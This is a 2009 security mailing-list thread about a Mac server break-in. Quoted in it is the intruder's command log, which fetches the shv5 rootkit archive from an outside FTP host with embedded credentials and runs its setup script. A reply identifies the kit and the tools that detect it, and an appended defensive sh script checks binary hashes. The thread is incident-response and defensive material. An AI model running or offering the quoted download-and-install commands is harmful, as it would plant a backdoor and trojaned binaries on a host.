[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347

Smith, Donald Donald.Smith at qwest.com
Mon Mar 30 14:49:24 EDT 2009


That is shv5, a Unix root kit. They may have updated it to compile on Macs, but it's been around for years.
It can be removed.
Rootkit hunter can detect it. http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
chkrootkit also finds it. http://www.chkrootkit.org

Primarily it puts up a back door ssh and trojans several binaries.
Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com gcia 

> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net 
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of 
> Joel Rosenblatt
> Sent: Monday, March 30, 2009 12:01 PM
> To: nsp-security at puck.nether.net
> Subject: [nsp-sec] MAC root kit found on www.funmangames.com 
> 208.113.230.135- ASN 26347
> 
> ----------- nsp-security Confidential --------
> 
> Hi,
> 
> We had a break-in of a Mac server (bad root password .. duh) 
> - upon going through the log of commands run, we came across
> 
> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
> 
> tar xzf kit5.tar
> 
> ls -a
> 
> cd shv5
> 
> ./setup abelha 54
> 
> It appears to be a Mac root kit.
> 
> AS      | IP               | AS Name
> 26347   | 208.113.230.135  | DREAMHOST-AS - New Dream Network, LLC
> 
> I wonder if it could be removed.
> 
> Thanks,
> Joel Rosenblatt
> 
> Joel Rosenblatt, Manager Network & Computer Security
> Columbia Information Security Office (CISO)
> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
> http://www.columbia.edu/~joel
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the 
> nsp-security
> community. Confidentiality is essential for effective 
> Internet security counter-measures.
> _______________________________________________
> 
> 
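The reply says the kit trojans several binaries and that rootkit hunter and chkrootkit will find it. What follows is an added example, not code from this thread and not the code of either tool: a portable sh script that records a SHA-256 manifest of a set of binaries while the host is known clean, then verifies the same files later and reports anything modified or missing, which is the file-integrity half of what those scanners do. The directory layout, the manifest format, the function names and the fake "binaries" in the demo are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): baseline-and-verify integrity check
# for system binaries. Paths, manifest format and demo files are assumptions.
set -u

# Use whichever SHA-256 tool the host has (coreutils sha256sum or BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Write one "<sha256>  <relative path>" line per file under $1/bin.
# Run this while the host is known clean; store the output off the host.
make_manifest() {
    root=$1
    for f in "$root"/bin/*; do
        printf '%s  %s\n' "$(sha256_of "$f")" "${f#$root/}"
    done
}

# Check every entry of manifest $1 against the tree rooted at $2.
# Prints one line per tampered or missing file; returns 1 if anything differs.
verify_manifest() {
    manifest=$1
    root=$2
    bad=0
    while read -r want path; do
        [ -n "$path" ] || continue
        if [ ! -f "$root/$path" ]; then
            printf 'MISSING  %s\n' "$path"
            bad=1
            continue
        fi
        have=$(sha256_of "$root/$path")
        if [ "$have" != "$want" ]; then
            printf 'MODIFIED %s (expected %s, got %s)\n' "$path" "$want" "$have"
            bad=1
        fi
    done <"$manifest"
    return $bad
}

# Offline demo on a constructed fake root: the "binaries" are plain text files.
# demo clean    -> baseline and verify untouched files, exit 0
# demo tampered -> replace two files the way a kit would, exit 1 with findings
demo() {
    mode=${1:-tampered}
    fake=$(mktemp -d)
    mkdir -p "$fake/bin"
    printf 'ls v1\n'      >"$fake/bin/ls"
    printf 'ps v1\n'      >"$fake/bin/ps"
    printf 'netstat v1\n' >"$fake/bin/netstat"
    make_manifest "$fake" >"$fake/manifest.txt"

    if [ "$mode" = tampered ]; then
        printf 'ls trojan\n'      >"$fake/bin/ls"
        printf 'netstat trojan\n' >"$fake/bin/netstat"
    fi

    verify_manifest "$fake/manifest.txt" "$fake"
    rc=$?
    rm -rf "$fake"
    return $rc
}

case "${1:-}" in
    --demo) demo tampered ;;
esac
```

Since the kit replaces the very utilities you would use to inspect the host, run the verification with binaries you trust (a mounted clean image or a statically linked toolkit) and keep the manifest somewhere the compromised host cannot write; a hash check executed through trojaned utilities proves nothing. The same caveat applies to the backdoor ssh the reply mentions: confirm what is actually listening from another machine rather than trusting the host's own tools.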